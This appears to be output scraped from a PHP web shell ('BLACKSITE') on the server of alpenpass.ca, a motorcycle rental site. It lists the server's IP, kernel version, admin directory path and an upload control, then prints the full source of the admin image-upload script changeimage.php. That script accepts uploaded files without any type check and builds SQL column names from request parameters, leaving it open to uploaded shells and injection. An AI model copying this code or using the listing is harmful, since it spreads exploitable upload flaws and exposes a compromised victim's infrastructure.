BLACKSITE
:
216.73.217.4
:
104.37.75.190 / alpenpass.ca
:
Linux server3.pointsplan.com 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
:
/
home
/
apca
/
www
/
admin
/
Upload File:
files >> /home/apca/www/admin/changeimage.php
<?php session_start(); error_reporting(0); include('includes/config.php'); if(strlen($_SESSION['alogin'])==0) { header('location:index.php'); } else{ $imgName=$_GET['imgName']; $imageType=$_GET['imageType']; $imgTest=explode(".",$imgName); $fieldName=($imageType=="product")? "Pimage".substr($imgTest[0], -1) : "Vimage".substr($imgTest[0], -1); $imageDirectory=($imageType=="product")? "productimages" : "vehicleimages"; $referredby=$_SERVER[HTTP_REFERER]; // Code for change password if(isset($_POST['update'])) { if($imageType=="product"){ $pimage=$_FILES[$imgName]["name"]; }else{ $vimage=$_FILES[$imgName]["name"]; } $id=intval($_GET['imgid']); echo "Got to line ".__LINE__." in ".__FILE__." _FILES[$imgName][\"tmp_name\"] is ".$_FILES[$imgName]["tmp_name"]." and _FILES[$imgName][\"name\"] is ".$_FILES[$imgName]["name"]." <br /><br />"; move_uploaded_file($_FILES[$imgName]["tmp_name"],"img/$imageDirectory/".$_FILES[$imgName]["name"]); if($imageType=="product"){ $sql="update tblproducts set $fieldName=:pimage where id=:id"; $query = $dbh->prepare($sql); $query->bindParam(':pimage',$pimage,PDO::PARAM_STR); }else{ $sql="update tblvehicles set $fieldName=:vimage where id=:id"; $query = $dbh->prepare($sql); $query->bindParam(':vimage',$vimage,PDO::PARAM_STR); } $query->bindParam(':id',$id,PDO::PARAM_STR); $query->execute(); $msg="Image updated successfully"; } ?> <!doctype html> <html lang="en" class="no-js"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <meta name="theme-color" content="#3e454c"> <title>Alpenpass Motorcycle Rental Portal | Admin Update $fieldName</title> <!-- Font awesome --> <link rel="stylesheet" href="css/font-awesome.min.css"> <!-- Sandstone Bootstrap CSS --> <link rel="stylesheet" href="css/bootstrap.min.css"> <!-- Bootstrap Datatables --> <link rel="stylesheet" href="css/dataTables.bootstrap.min.css"> <!-- Bootstrap social button library --> <link rel="stylesheet" href="css/bootstrap-social.css"> <!-- Bootstrap select --> <link rel="stylesheet" href="css/bootstrap-select.css"> <!-- Bootstrap file input --> <link rel="stylesheet" href="css/fileinput.min.css"> <!-- Awesome Bootstrap checkbox --> <link rel="stylesheet" href="css/awesome-bootstrap-checkbox.css"> <!-- Admin Stye --> <link rel="stylesheet" href="css/style.css"> <style> .errorWrap { padding: 10px; margin: 0 0 20px 0; background: #fff; border-left: 4px solid #dd3d36; -webkit-box-shadow: 0 1px 1px 0 rgba(0,0,0,.1); box-shadow: 0 1px 1px 0 rgba(0,0,0,.1); } .succWrap{ padding: 10px; margin: 0 0 20px 0; background: #fff; border-left: 4px solid #5cb85c; -webkit-box-shadow: 0 1px 1px 0 rgba(0,0,0,.1); box-shadow: 0 1px 1px 0 rgba(0,0,0,.1); } </style> </head> <body> <?php include('includes/header.php');?> <div class="ts-main-content"> <?php include('includes/leftbar.php');?> <div class="content-wrapper"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <?php $titleName=($imageType=="product")? "Product " : "Vehicle " ?> <h2 class="page-title"><?php echo $titleName.$fieldName; ?> </h2> <div class="row"> <div class="col-md-10"> <div class="panel panel-default"> <div class="panel-heading"><?php echo $titleName.$fieldName; ?> Details</div> <div class="panel-body"> <form method="post" class="form-horizontal" enctype="multipart/form-data"> <?php if($error){?><div class="errorWrap"><strong>ERROR</strong>:<?php echo htmlentities($error); ?> </div><?php } else if($msg){?><div class="succWrap"><strong>SUCCESS</strong>:<?php echo htmlentities($msg); ?> </div><?php }?> <div class="form-group"> <label class="col-sm-4 control-label">Current <?php echo $fieldName; ?></label> <?php $id=intval($_GET['imgid']); if($imageType=="product"){ $sql ="SELECT $fieldName from tblproducts where tblproducts.id=:id"; }else{ $sql ="SELECT $fieldName from tblvehicles where tblvehicles.id=:id"; } $query = $dbh -> prepare($sql); $query-> bindParam(':id', $id, PDO::PARAM_STR); $query->execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); $cnt=1; if($query->rowCount() > 0) { foreach($results as $result) { ?> <div class="col-sm-8"> <img src="img/<?php echo $imageDirectory; ?>/<?php echo htmlentities($result->$fieldName);?>" width="300" style="border:solid 1px #000"> </div> <?php }}?> </div> <div class="form-group"> <label class="col-sm-4 control-label">Upload New <?php echo $fieldName; ?><span style="color:red">*</span></label> <div class="col-sm-8"> <input type="file" name="<?php echo $imgName; ?>" required> </div> </div> <div class="hr-dashed"></div> <div class="form-group"> <div class="col-sm-8 col-sm-offset-4"> <button class="btn btn-primary" name="update" type="submit">Update</button><br /><br /> <?php if($imageType=="product"){?> <a href="https://alpenpass.ca/admin/edit-product.php?id=<?php echo $id; ?>" >Return to <?php echo $titleName;?></a><br /> <a href="manage-products.php">Return to <?php echo $titleName;?> List</a> <?php }else{ ?> <a href="https://alpenpass.ca/admin/edit-vehicle.php?id=<?php echo $id; ?>" >Return to <?php echo $titleName;?></a><br /> <a href="manage-vehicles.php">Return to <?php echo $titleName;?> List</a> <?php } ?> </div> </div> </form> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Loading Scripts --> <script src="js/jquery.min.js"></script> <script src="js/bootstrap-select.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.dataTables.min.js"></script> <script src="js/dataTables.bootstrap.min.js"></script> <script src="js/Chart.min.js"></script> <script src="js/fileinput.js"></script> <script src="js/chartData.js"></script> <script src="js/main.js"></script> </body> </html> <?php } ?>